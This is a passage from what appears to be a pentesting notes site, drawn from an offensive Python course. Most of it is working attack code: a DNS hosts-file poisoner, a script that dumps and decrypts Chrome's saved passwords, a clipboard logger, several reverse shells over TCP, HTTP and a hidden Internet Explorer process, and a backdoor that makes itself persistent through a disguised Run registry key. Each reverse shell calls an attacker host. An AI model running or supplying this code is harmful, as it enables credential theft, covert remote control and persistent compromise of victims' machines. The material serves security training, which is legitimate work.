              echo 10.10.120.12 google.com >> c:\\Windows\\System32\\drivers\\etc\n

              2. Flush the DNS cache to make sure that we will use the updated record

              ipconfig /flushdns\n

              Now traffic will be redirected to the attacker machine.

              ","tags":["python","python pentesting","techniques","DNS poisoning"]},{"location":"python/dns-poisoning/#python-script-for-dns-poisoning","title":"Python script for DNS poisoning","text":"
              import subprocess\nimport os\n\nos.chdir(\"C:\\Windows\\System32\\drivers\\etc\")\n\ncommand = \"echo 10.10.10.100 www.google.com >> hosts\"\n\nCMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n\ncommand = \"ipconfig /flushdns\"\n\nCMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n
              ","tags":["python","python pentesting","techniques","DNS poisoning"]},{"location":"python/dumping-chrome-saved-passwords/","title":"Dumping saved passwords from Google Chrome","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course
              • Gaining persistence shells (TCP + HTTP):
                • Coding a TCP connection and a reverse shell.
                • Coding a low level data exfiltration - TCP connection.
                • Coding an http reverse shell.
                • Coding a data exfiltration script for a http shell.
                • Tunning the connection attempts.
                • Including cd command into TCP reverse shell.
              • Advanced scriptable shells:
                • Using a Dynamic DNS instead of your bared attacker public ip.
                • Making your binary persistent.
                • Making a screenshot.
                • Coding a reverse shell that searches files.
              • Techniques for bypassing filters:
                • Coding a reverse shell that scans ports.
                • Hickjack the Internet Explorer process to bypass an host-based firewall.
                • Bypassing Next Generation Firewalls.
                • Bypassing IPS with handmade XOR Encryption.
              • Malware and crytography:
                • TCP reverse shell with AES encryption.
                • TCP reverse shell with RSA encryption.
                • TCP reverse shell with hybrid encryption AES + RSA.
              • Password Hickjacking:
                • Simple keylogger in python.
                • Hijacking Keepass Password Manager.
                • Dumping saved passwords from Google Chrome.
                • Man in the browser attack.
                • DNS Poisoning.
              • Privilege escalation:
                • Weak service file permission.
              ","tags":["python","python pentesting","scripting","keylogger"]},{"location":"python/dumping-chrome-saved-passwords/#how-does-chrome-saved-passwords-work","title":"How does Chrome saved passwords work?","text":"

              Chrome uses windows session password to encrypt and decrypt saved passwords. Encrypted passwords are stored in a SQlite db called 'Login Data DB' located at:

              C:\\Users\\%USERNAME%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\n

              Chrome calls to the windows API function called \"CryptProtectData\", which uses the windows login password as an encryption key and in reverse operation a windows API function called \"CryptUnprotectData\" to decrypt the password value back to clear text.

              1. Install sqlite from: https://sqlitebrowser.org/dl/

              2. Open DB Browser sqlite.

              3. In your windows explorer, go to the path where sqlite db is stored and copy the file \"Login Data\" to your Desktop.

              4. Change the extension of \"Login Data\" file to .sqlite3

              5. Open \"Login Data.sqlite3\" in DB Browser sqlite.

              6. Go to tab \"Browse Data\" (Hoja de Datos in spanish) and select the table login. There you have all stored passwords.

              ","tags":["python","python pentesting","scripting","keylogger"]},{"location":"python/dumping-chrome-saved-passwords/#our-script","title":"Our script","text":"

              The route map for this script will be:

              1. Guessing the path to sqlite database: username and browser used by the victim.

              C:\\Users\\%USERNAME%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\n

              2. Sending the password value from a column in \"logins\" table, in \"Login Data.sqlite3\" to function CryptUn ProtectData.

              3. Send the passwords through a reverse shell.

              ","tags":["python","python pentesting","scripting","keylogger"]},{"location":"python/dumping-chrome-saved-passwords/#script-for-gathering-passwords","title":"Script for gathering passwords","text":"

              Here is the script provided in the course (it doesn't work, below I've pasted a different one that works):

              # Python For Offensive PenTest: A Complete Practical Course  - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nfrom os import getenv \n# To find out the Chrome SQL path- C:\\Users\\%USERNAME%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data\n\nimport sqlite3 # To read the Chrome SQLite DB\n\nimport win32crypt  # High level library to call windows API CryptUnprotectData\n\nfrom shutil import copyfile # To make a copy of the Chrome SQLite DB\n\n\n# LOCALAPPDATA is a Windows Environment Variable which points to >>> C:\\Users\\{username}\\AppData\\Local\npath = getenv(\"LOCALAPPDATA\")+r\"\\Google\\Chrome\\User Data\\Default\\Login Data\"\n\n# make a copy the Login Data DB and pull data out of the copied DB, so there are no conflicts in case that the user is using the original (maybe she is logged into facebook, let's say)\npath2 = getenv(\"LOCALAPPDATA\")+r\"\\Google\\Chrome\\User Data\\Default\\Login2\"\ncopyfile(path, path2)\n\n# Connect to the copied Database\nconn = sqlite3.connect(path2)\n\n\ncursor = conn.cursor() #Create a Cursor object and call its execute() method to perform SQL commands like SELECT\n\n# SELECT column_name,column_name FROM table_name\n# SELECT action_url and username_value and password_value FROM table logins\ncursor.execute('SELECT action_url, username_value, password_value FROM logins')\n\n\n# To retrieve data after executing a SELECT statement, we call fetchall() to get a list of the matching rows.\nfor raw in cursor.fetchall():\n\n    print(raw[0] + '\\n' + raw[1]) # print the action_url (raw[0]) and print the username_value (raw[1])\n\n    password = win32crypt.CryptUnprotectData(raw[2])[1] # pass the encrypted Password to CryptUnprotectData API function to decrypt it  \n\n    print(password)\nconn.close()\n

              Script that works. These are requirements:

              pip install PyCryptodome\n

              Script:

              import os\nimport json\nimport base64\nimport sqlite3\nimport win32crypt\nfrom Crypto.Cipher import AES\nimport shutil\n\ndef get_master_key():\n    with open(os.environ['USERPROFILE'] + os.sep + r'AppData\\Local\\Google\\Chrome\\User Data\\Local State', \"r\") as f:\n        local_state = f.read()\n        local_state = json.loads(local_state)\n    master_key = base64.b64decode(local_state[\"os_crypt\"][\"encrypted_key\"])\n    master_key = master_key[5:]  # removing DPAPI\n    master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1]\n    return master_key\n\ndef decrypt_payload(cipher, payload):\n    return cipher.decrypt(payload)\n\ndef generate_cipher(aes_key, iv):\n    return AES.new(aes_key, AES.MODE_GCM, iv)\n\ndef decrypt_password(buff, master_key):\n    try:\n        iv = buff[3:15]\n        payload = buff[15:]\n        cipher = generate_cipher(master_key, iv)\n        decrypted_pass = decrypt_payload(cipher, payload)\n        decrypted_pass = decrypted_pass[:-16].decode()  # remove suffix bytes\n        return decrypted_pass\n    except Exception as e:\n        # print(\"Probably saved password from Chrome version older than v80\\n\")\n        # print(str(e))\n        return \"Chrome < 80\"\n\n\nmaster_key = get_master_key()\nlogin_db = os.environ['USERPROFILE'] + os.sep + r'AppData\\Local\\Google\\Chrome\\User Data\\default\\Login Data'\nshutil.copy2(login_db, \"Loginvault.db\") #making a temp copy since Login Data DB is locked while Chrome is running\nconn = sqlite3.connect(\"Loginvault.db\")\ncursor = conn.cursor()\ntry:\n    cursor.execute(\"SELECT action_url, username_value, password_value FROM logins\")\n    for r in cursor.fetchall():\n        url = r[0]\n        username = r[1]\n        encrypted_password = r[2]\n        decrypted_password = decrypt_password(encrypted_password, master_key)\n        if len(username) > 0:\n            print(\"URL: \" + url + \"\\nUser Name: \" + username + \"\\nPassword: \" + decrypted_password + \"\\n\" + \"*\" * 50 + \"\\n\")\nexcept Exception as e:\n    pass\ncursor.close()\nconn.close()\ntry:\n    os.remove(\"Loginvault.db\")\nexcept Exception as e:\n    pass\n
              ","tags":["python","python pentesting","scripting","keylogger"]},{"location":"python/dumping-chrome-saved-passwords/#script-with-gathering-passwords-phase-integrated-in-a-reverse-shell","title":"Script with gathering passwords phase integrated in a reverse shell","text":"
              # Python For Offensive PenTest: A Complete Practical Course  - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\nimport json\nimport base64\nfrom os import getenv \n# To find out the Chrome SQL path- C:\\Users\\%USERNAME%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data\n\nimport sqlite3 # To read the Chrome SQLite DB\nfrom Crypto.Cipher import AES\nimport win32crypt  # High level library to call windows API CryptUnprotectData\n\nfrom shutil import copyfile # To make a copy of the Chrome SQLite DB\n\n\n# LOCALAPPDATA is a Windows Environment Variable which points to >>> C:\\Users\\{username}\\AppData\\Local\npath = getenv(\"LOCALAPPDATA\")+r\"\\Google\\Chrome\\User Data\\Default\\Login Data\"\n\n# make a copy the Login Data DB and pull data out of the copied DB\npath2 = getenv(\"LOCALAPPDATA\")+r\"\\Google\\Chrome\\User Data\\Default\\Login2\"\ncopyfile(path, path2)\n\n# Connect to the copied Database\nconn = sqlite3.connect(path2)\n\n\ncursor = conn.cursor() #Create a Cursor object and call its execute() method to perform SQL commands like SELECT\n\n# SELECT column_name,column_name FROM table_name\n# SELECT action_url and username_value and password_value FROM table logins\ncursor.execute('SELECT action_url, username_value, password_value FROM logins')\n\n\n# To retrieve data after executing a SELECT statement, we call fetchall() to get a list of the matching rows.\nfor raw in cursor.fetchall():\n\n    print(raw[0] + '\\n' + raw[1]) # print the action_url (raw[0]) and print the username_value (raw[1])\n\n    password = win32crypt.CryptUnprotectData(raw[2])[1] # pass the encrypted Password to CryptUnprotectData API function to decrypt it  \n\n    print(password)\nconn.close()\n
              ","tags":["python","python pentesting","scripting","keylogger"]},{"location":"python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/","title":"Hickjack the Internet Explorer process to bypass an host-based firewall","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course
              • Gaining persistence shells (TCP + HTTP):
                • Coding a TCP connection and a reverse shell.
                • Coding a low level data exfiltration - TCP connection.
                • Coding an http reverse shell.
                • Coding a data exfiltration script for a http shell.
                • Tunning the connection attempts.
                • Including cd command into TCP reverse shell.
              • Advanced scriptable shells:
                • Using a Dynamic DNS instead of your bared attacker public ip.
                • Making your binary persistent.
                • Making a screenshot.
                • Coding a reverse shell that searches files.
              • Techniques for bypassing filters:
                • Coding a reverse shell that scans ports.
                • Hickjack the Internet Explorer process to bypass an host-based firewall.
                • Bypassing Next Generation Firewalls.
                • Bypassing IPS with handmade XOR Encryption.
              • Malware and crytography:
                • TCP reverse shell with AES encryption.
                • TCP reverse shell with RSA encryption.
                • TCP reverse shell with hybrid encryption AES + RSA.
              • Password Hickjacking:
                • Simple keylogger in python.
                • Hijacking Keepass Password Manager.
                • Dumping saved passwords from Google Chrome.
                • Man in the browser attack.
                • DNS Poisoning.
              • Privilege escalation:
                • Weak service file permission.

              For our script to bypass a host-based firewall (based on an ACL), we will hickjack the Internet Explorer process to conceal our traffick and bypass it.

              ","tags":["python","python pentesting","scripting","reverse shell","bypassing techniques","host based firewall"]},{"location":"python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#client-side","title":"Client side","text":"

              Make sure that the victim machine (a windows 10) has installed these two python libraries: pypiwin32 and pywin32.

              To be run on our victim's machine.

              # Python For Offensive PenTest: A Complete Practical Course  - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\nfrom win32com.client import Dispatch\nfrom time import sleep\nimport subprocess\n\nie = Dispatch(\"InternetExplorer.Application\") # Create browser instance.\nie.Visible = 0 # Make it invisible [ run in background ] (1= visible)\n\n# Paramaeters for POST\ndURL = \"http://192.168.0.152\"  \nFlags = 0\nTargetFrame = 0\n\n\nwhile True:\n    ie.Navigate(\"http://192.168.0.152\") # Navigate to our kali web server (the attacker machine) to grab the hacker commands\n    while ie.ReadyState != 4: # Wait for browser to finish loading.\n        sleep(1)\n\n    command = ie.Document.body.innerHTML \n    command = command.encode() # encode the command\n    if 'terminate' in command.decode():\n        ie.Quit() # quit the IE and end up the process\n        break\n    else:\n        CMD = subprocess.Popen(command.decode(), shell=True, stdin=subprocess.PIPE, stderr=subprocess.PIPE, stdout=subprocess.PIPE)\n        Data = CMD.stdout.read()\n        PostData = memoryview( Data ) # in order to submit or post data using COM technique , it requires to  buffer the data first using memoryview\n        ie.Navigate(dURL, Flags, TargetFrame, PostData) # we post the comamnd execution result along with the post parameters which we defined eariler..\n\n    sleep(3)\n
              ","tags":["python","python pentesting","scripting","reverse shell","bypassing techniques","host based firewall"]},{"location":"python/hijacking-keepass/","title":"Hijacking Keepass Password Manager","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course
              • Gaining persistence shells (TCP + HTTP):
                • Coding a TCP connection and a reverse shell.
                • Coding a low level data exfiltration - TCP connection.
                • Coding an http reverse shell.
                • Coding a data exfiltration script for a http shell.
                • Tunning the connection attempts.
                • Including cd command into TCP reverse shell.
              • Advanced scriptable shells:
                • Using a Dynamic DNS instead of your bared attacker public ip.
                • Making your binary persistent.
                • Making a screenshot.
                • Coding a reverse shell that searches files.
              • Techniques for bypassing filters:
                • Coding a reverse shell that scans ports.
                • Hickjack the Internet Explorer process to bypass an host-based firewall.
                • Bypassing Next Generation Firewalls.
                • Bypassing IPS with handmade XOR Encryption.
              • Malware and crytography:
                • TCP reverse shell with AES encryption.
                • TCP reverse shell with RSA encryption.
                • TCP reverse shell with hybrid encryption AES + RSA.
              • Password Hickjacking:
                • Simple keylogger in python.
                • Hijacking Keepass Password Manager.
                • Dumping saved passwords from Google Chrome.
                • Man in the browser attack.
                • DNS Poisoning.
              • Privilege escalation:
                • Weak service file permission.
              # Python For Offensive PenTest: A Complete Practical Course- All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\n#pip install pyperclip\n\nimport pyperclip \nimport time\n\nlist = [] # we create a list which will store the clipboard content\n\nwhile True: # infifnite loop to continously check the  clipboard\n\n    if pyperclip.paste() != 'None': # if the clipboard content is not empty ...\n        value = pyperclip.paste() # then we will take its value and put it into variable called value\n\n#now to make sure that we don't get replicated items in our list before appending the value varaible into our list, we gonna check if the value is stored eariler in the first place, if not then this menas this is a new item and we will append it to our list\n\n\n        if value not in list:\n            list.append(value)\n\n        print(list)\n\n        time.sleep(3)\n
              ","tags":["python","python pentesting","scripting","keylogger"]},{"location":"python/including-cd-command-into-tcp-reverse-shell/","title":"Including cd command into TCP reverse shell","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course
              • Gaining persistence shells (TCP + HTTP):
                • Coding a TCP connection and a reverse shell.
                • Coding a low level data exfiltration - TCP connection.
                • Coding an http reverse shell.
                • Coding a data exfiltration script for a http shell.
                • Tunning the connection attempts.
                • Including cd command into TCP reverse shell.
              • Advanced scriptable shells:
                • Using a Dynamic DNS instead of your bared attacker public ip.
                • Making your binary persistent.
                • Making a screenshot.
                • Coding a reverse shell that searches files.
              • Techniques for bypassing filters:
                • Coding a reverse shell that scans ports.
                • Hickjack the Internet Explorer process to bypass an host-based firewall.
                • Bypassing Next Generation Firewalls.
                • Bypassing IPS with handmade XOR Encryption.
              • Malware and crytography:
                • TCP reverse shell with AES encryption.
                • TCP reverse shell with RSA encryption.
                • TCP reverse shell with hybrid encryption AES + RSA.
              • Password Hickjacking:
                • Simple keylogger in python.
                • Hijacking Keepass Password Manager.
                • Dumping saved passwords from Google Chrome.
                • Man in the browser attack.
                • DNS Poisoning.
              • Privilege escalation:
                • Weak service file permission.
              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/including-cd-command-into-tcp-reverse-shell/#client-side","title":"Client side","text":"

              To be run on victim's computer.

              # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nimport socket\nimport subprocess\nimport os\n\ndef transfer(s, path):\n    if os.path.exists(path):\n        f = open(path, 'rb')\n        packet = f.read(1024)\n        while packet:\n            s.send(packet)\n            packet = f.read(1024)\n        s.send('DONE'.encode())\n        f.close()\n    else:\n        s.send('Unable to find out the file'.encode())\n\ndef connect():\n    s = socket.socket()\n    s.connect(('192.168.0.152', 8080))\n    while True:\n        command = s.recv(1024)\n        if 'terminate' in command.decode():\n            s.close()\n            break\n        elif 'grab' in command.decode():\n            grab, path = command.decode().split('*')\n            try:\n                transfer(s, path)\n            except Exception as e:\n                s.send(str(e).encode())\n                pass\n        elif 'cd' in command.decode():\n            code, directory = command.decode().split('*') # the syntax here is gonna be cd*directory\n            try:\n                os.chdir(directory) # changing the directory \n                s.send(('[+] CWD is ' + os.getcwd()).encode()) # we send back a string mentioning the new CWD Current working directory\n            except Exception as e:\n                s.send(('[-]  ' + str(e)).encode())\n        else:\n            CMD = subprocess.Popen(command.decode(), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n            s.send(CMD.stdout.read())\n            s.send(CMD.stderr.read())\n\ndef main():\n    connect()\n\nmain()\n
              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/including-cd-command-into-tcp-reverse-shell/#server-side","title":"Server side","text":"

              To be run on attacker's computer.

              # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nimport socket\n\ndef connect():\n\n    s = socket.socket()\n    s.bind((\"10.0.2.15\", 1234))\n    s.listen(1) # define the backlog size for the Queue, I made it 1 as we are expecting a single connection from a single\n    conn, addr = s.accept() # accept() function will retuen the connection object ID (conn) and will return the client(target) IP address and source port in a tuple format (IP,port)\n    print ('[+] We got a connection from', addr)\n\n    while True:\n\n        command = input(\"Shell> \")\n\n        if 'terminate' in command: # If we got terminate command, inform the client and close the connect and break the loop\n            conn.send('terminate'.encode())\n            conn.close()\n            break\n        elif '' in command: # If the user just click enter, we will send a whoami command\n            conn.send('whoami'.encode()) \n            print( conn.recv(1024).decode()) \n        else:\n            conn.send(command.encode()) # Otherwise we will send the command to the target\n            print( conn.recv(1024).decode()) # print the result that we got back\n\ndef main():\n    connect()\nmain()\n
              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/including-cd-command-into-tcp-reverse-shell/#using-pyinstaller","title":"Using pyinstaller","text":"

              See pyinstaller.

              ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/making-a-screenshot/","title":"Making a screenshot","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course
              • Gaining persistence shells (TCP + HTTP):
                • Coding a TCP connection and a reverse shell.
                • Coding a low level data exfiltration - TCP connection.
                • Coding an http reverse shell.
                • Coding a data exfiltration script for a http shell.
                • Tunning the connection attempts.
                • Including cd command into TCP reverse shell.
              • Advanced scriptable shells:
                • Using a Dynamic DNS instead of your bared attacker public ip.
                • Making your binary persistent.
                • Making a screenshot.
                • Coding a reverse shell that searches files.
              • Techniques for bypassing filters:
                • Coding a reverse shell that scans ports.
                • Hickjack the Internet Explorer process to bypass an host-based firewall.
                • Bypassing Next Generation Firewalls.
                • Bypassing IPS with handmade XOR Encryption.
              • Malware and crytography:
                • TCP reverse shell with AES encryption.
                • TCP reverse shell with RSA encryption.
                • TCP reverse shell with hybrid encryption AES + RSA.
              • Password Hickjacking:
                • Simple keylogger in python.
                • Hijacking Keepass Password Manager.
                • Dumping saved passwords from Google Chrome.
                • Man in the browser attack.
                • DNS Poisoning.
              • Privilege escalation:
                • Weak service file permission.
              ","tags":["python","python pentesting","scripting","reverse shell","screenshot capturer"]},{"location":"python/making-a-screenshot/#client-side","title":"Client side","text":"

              To be run on the victim's machine.

              # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nimport requests\nimport os\nimport subprocess\nimport time\n\n\nfrom PIL import ImageGrab # Used to Grab a screenshot\nimport tempfile           # Used to Create a temp directory\nimport shutil             # Used to Remove the temp directory\n\n\nwhile True:\n    req = requests.get('http://192.168.0.152:8080')\n    command = req.text\n    if 'terminate' in command:\n        break\n    elif 'grab' in command:\n        grab, path = command.split(\"*\")\n        if os.path.exists(path):\n            url = \"http://192.168.0.152:8080/store\"\n            files = {'file': open(path, 'rb')}\n            r = requests.post(url, files=files)\n        else:\n            post_response = requests.post(url='http://192.168.0.152:8080', data='[-] Not able to find the file!'.encode())\n\n    elif 'screencap' in command: #If we got a screencap keyword, then ..\n\n        dirpath = tempfile.mkdtemp() #Create a temp dir to store our screenshot file\n        ImageGrab.grab().save(dirpath + \"\\img.jpg\", \"JPEG\") #Save the screencap in the temp dir\n\n        url = \"http://192.168.0.152:8080/store\"\n        files = {'file': open(dirpath + \"\\img.jpg\", 'rb')}\n        r = requests.post(url, files=files) #Transfer the file over our HTTP\n\n        files['file'].close() #Once the file gets transfered, close the file.\n        shutil.rmtree(dirpath) #Remove the entire temp dir\n\n    else:\n        CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stdout.read())\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stderr.read())\n    time.sleep(3)\n
              ","tags":["python","python pentesting","scripting","reverse shell","screenshot capturer"]},{"location":"python/making-your-binary-persistent/","title":"Making your binary persistent","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course
              • Gaining persistence shells (TCP + HTTP):
                • Coding a TCP connection and a reverse shell.
                • Coding a low level data exfiltration - TCP connection.
                • Coding an http reverse shell.
                • Coding a data exfiltration script for a http shell.
                • Tunning the connection attempts.
                • Including cd command into TCP reverse shell.
              • Advanced scriptable shells:
                • Using a Dynamic DNS instead of your bared attacker public ip.
                • Making your binary persistent.
                • Making a screenshot.
                • Coding a reverse shell that searches files.
              • Techniques for bypassing filters:
                • Coding a reverse shell that scans ports.
                • Hickjack the Internet Explorer process to bypass an host-based firewall.
                • Bypassing Next Generation Firewalls.
                • Bypassing IPS with handmade XOR Encryption.
              • Malware and crytography:
                • TCP reverse shell with AES encryption.
                • TCP reverse shell with RSA encryption.
                • TCP reverse shell with hybrid encryption AES + RSA.
              • Password Hickjacking:
                • Simple keylogger in python.
                • Hijacking Keepass Password Manager.
                • Dumping saved passwords from Google Chrome.
                • Man in the browser attack.
                • DNS Poisoning.
              • Privilege escalation:
                • Weak service file permission.

              In order for a binary to persist, the binary must do three things:

              1. To copy itself into a different location. We need source path (current working directory) and destination path, for instance, the Document folder. This means that we need to know the username:

              ```cmd\n    c:\\Users\\<username>\\Documents\n```\n

              2. To add a registry key pointing to our new exe location. This is done only the first time.

              3. For consecutive times, we have to avoid repeating steps 1 and 2.

              ","tags":["python","python pentesting","scripting","reverse shell","persistence","registry"]},{"location":"python/making-your-binary-persistent/#phases-for-persistence","title":"Phases for persistence","text":"","tags":["python","python pentesting","scripting","reverse shell","persistence","registry"]},{"location":"python/making-your-binary-persistent/#1-system-recognition","title":"1. System recognition","text":"

              Getting to know the current working directory + the user profile.

              ","tags":["python","python pentesting","scripting","reverse shell","persistence","registry"]},{"location":"python/making-your-binary-persistent/#2-copy-the-binary-to-a-different-location","title":"2. Copy the binary to a different location","text":"

              If the binary is not found in the destination folder, we can assume this is the first time we're running it. Then:

              We will copy the binary to a different location. For that, we need a source path (current working directory) and a destination path, for instance, the Document folder. This means that we need to know the current working directory (for the source path) and the username (for the destination path):

              ```cmd\n    c:\\Users\\<username>\\Documents\n```\n

              This information was already retrieved in step 1 (System recognition).

              ","tags":["python","python pentesting","scripting","reverse shell","persistence","registry"]},{"location":"python/making-your-binary-persistent/#3-add-a-registry-key","title":"3. Add a Registry key","text":"

              If the binary is not found in the destination folder, we can assume this is the first time we're running it. Then:

              We will add a Registry key.

              ","tags":["python","python pentesting","scripting","reverse shell","persistence","registry"]},{"location":"python/making-your-binary-persistent/#4-fire-up-our-shell","title":"4. Fire up our shell","text":"","tags":["python","python pentesting","scripting","reverse shell","persistence","registry"]},{"location":"python/making-your-binary-persistent/#client-side","title":"Client side","text":"

              To be run on our victim's machine.

              # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\nimport requests\nimport os\nimport subprocess\nimport time\nimport shutil \nimport winreg as wreg\n\n#Reconn Phase\npath = os.getcwd().strip('/n')\n\nNull, userprof = subprocess.check_output('set USERPROFILE', shell=True,stdin=subprocess.PIPE,  stderr=subprocess.PIPE).decode().split('=')\n\ndestination = userprof.strip('\\n\\r') + '\\\\Documents\\\\' + 'client.exe'\n\n#If it was the first time our backdoor gets executed, then Do phase 1 and phase 2 \nif not os.path.exists(destination):\n    shutil.copyfile(path+'\\client.exe', destination) #You can replace   path+'\\client.exe' with sys.argv[0] ---> the sys.argv[0] will return the file name\n\n    key = wreg.OpenKey(wreg.HKEY_CURRENT_USER, \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\", 0, wreg.KEY_ALL_ACCESS)\n    wreg.SetValueEx(key, 'RegUpdater', 0, wreg.REG_SZ, destination)\n    key.Close()\n\n\n\n#Last phase is to start a reverse connection back to our kali machine\n\nwhile True:\n    req = requests.get('http://192.168.0.152:8080')\n    command = req.text\n    if 'terminate' in command:\n        break\n    elif 'grab' in command:\n        grab, path = command.split(\"*\")\n        if os.path.exists(path):\n            url = \"http://192.168.0.152:8080/store\"\n            files = {'file': open(path, 'rb')}\n            r = requests.post(url, files=files)\n        else:\n            post_response = requests.post(url='http://192.168.0.152:8080', data='[-] Not able to find the file!'.encode())\n    else:\n        CMD = subprocess.Popen(command, shell=True,stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stdout.read())\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stderr.read())\n    time.sleep(3)\n
              ","tags":["python","python pentesting","scripting","reverse shell","persistence","registry"]},{"location":"python/man-in-the-browser-attack/","title":"Man in the browser attack","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course
              • Gaining persistence shells (TCP + HTTP):
                • Coding a TCP connection and a reverse shell.
                • Coding a low level data exfiltration - TCP connection.
                • Coding an http reverse shell.
                • Coding a data exfiltration script for a http shell.
                • Tunning the connection attempts.
                • Including cd command into TCP reverse shell.
              • Advanced scriptable shells:
                • Using a Dynamic DNS instead of your bared attacker public ip.
                • Making your binary persistent.
                • Making a screenshot.
                • Coding a reverse shell that searches files.
              • Techniques for bypassing filters:
                • Coding a reverse shell that scans ports.
                • Hickjack the Internet Explorer process to bypass an host-based firewall.
                • Bypassing Next Generation Firewalls.
                • Bypassing IPS with handmade XOR Encryption.
              • Malware and crytography:
                • TCP reverse shell with AES encryption.
                • TCP reverse shell with RSA encryption.
                • TCP reverse shell with hybrid encryption AES + RSA.
              • Password Hickjacking:
                • Simple keylogger in python.
                • Hijacking Keepass Password Manager.
                • Dumping saved passwords from Google Chrome.
                • Man in the browser attack.
                • DNS Poisoning.
              • Privilege escalation:
                • Weak service file permission.

              All the browsers offer to save username/password when you submit these data into a login page, so on the next time you visit the same login page you will see your username/password are automatically filled in without typing a single letter. Also, there's third party software like lastpass can do the same job for you.

              If the target was using this method for login, then neither the keylogger nor the clipboard methods will work.

              Modern hackers have invented a new attack called -man in the browser- to overcome the above scenario.

              In a nutshell, man in the browser attack intercepts the browser API calls and extracts the data (clear text) before it's getting out to the network socket (SSL encrypted).

              ","tags":["python","python pentesting","techniques","firefox","browsers"]},{"location":"python/man-in-the-browser-attack/#steps-to-intercept-a-process-api-calls-are-","title":"Steps to intercept a process API calls are:-","text":"

              A. Get the Process ID (PID) of the browser process

              B. Attach a debugger to this PID

              C. Specify the DLL library that you want to intercept

              D. Specify the function name and resolve its memory address

              E. Set BreakPoint and register a call back function

              F. Wait for debug events using debug loop

              G. Once the debug event occur ( meaning once the browser calls the function inside the DLL), execute the call back function

              H. Return the original process

              ","tags":["python","python pentesting","techniques","firefox","browsers"]},{"location":"python/pip/","title":"Pip","text":"","tags":["python","scripting","package manager"]},{"location":"python/pip/#installation","title":"Installation","text":"","tags":["python","scripting","package manager"]},{"location":"python/pip/#basic-usage","title":"Basic usage","text":"","tags":["python","scripting","package manager"]},{"location":"python/pip/#some-interesting-libraries","title":"Some interesting libraries","text":"Library What it does Install More Info Pillow Pillow\u00a0and its predecessor,\u00a0PIL, are the original Python\u00a0libraries for dealing with images. pip install Pillow https://realpython.com/image-processing-with-the-python-pillow-library/","tags":["python","scripting","package manager"]},{"location":"python/privilege-escalation/","title":"Privilege escalation - Weak service file permission","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course
              • Gaining persistence shells (TCP + HTTP):
                • Coding a TCP connection and a reverse shell.
                • Coding a low level data exfiltration - TCP connection.
                • Coding an http reverse shell.
                • Coding a data exfiltration script for a http shell.
                • Tunning the connection attempts.
                • Including cd command into TCP reverse shell.
              • Advanced scriptable shells:
                • Using a Dynamic DNS instead of your bared attacker public ip.
                • Making your binary persistent.
                • Making a screenshot.
                • Coding a reverse shell that searches files.
              • Techniques for bypassing filters:
                • Coding a reverse shell that scans ports.
                • Hickjack the Internet Explorer process to bypass an host-based firewall.
                • Bypassing Next Generation Firewalls.
                • Bypassing IPS with handmade XOR Encryption.
              • Malware and crytography:
                • TCP reverse shell with AES encryption.
                • TCP reverse shell with RSA encryption.
                • TCP reverse shell with hybrid encryption AES + RSA.
              • Password Hickjacking:
                • Simple keylogger in python.
                • Hijacking Keepass Password Manager.
                • Dumping saved passwords from Google Chrome.
                • Man in the browser attack.
                • DNS Poisoning.
              • Privilege escalation:
                • Weak service file permission.
              ","tags":["python","python pentesting","scripting","windows privilege escalation","privilege escalation"]},{"location":"python/privilege-escalation/#setting-up-the-lab","title":"Setting up the lab","text":"

              1. Download vulnerable application from https://www.exploit-db.com/exploits/24872 and install it for all users on a windows VM.

              2. Create a non admin account in the Windows VM. For instance: - user: nonadmin - password: 123123

              3. Restart the windows VM and login as nonadmin user.

              4. Open the PhotoDex application and in Task Manager locate the service that gets created by the application. It's called ScsiAccess.\u00e7

              5. Open properties of ScsiAccess service and locate the path to executable. It should be something like:

              C:\\Program Files\\Photodex\\ProShow PRoducer\\ScsiAccess.exe\n

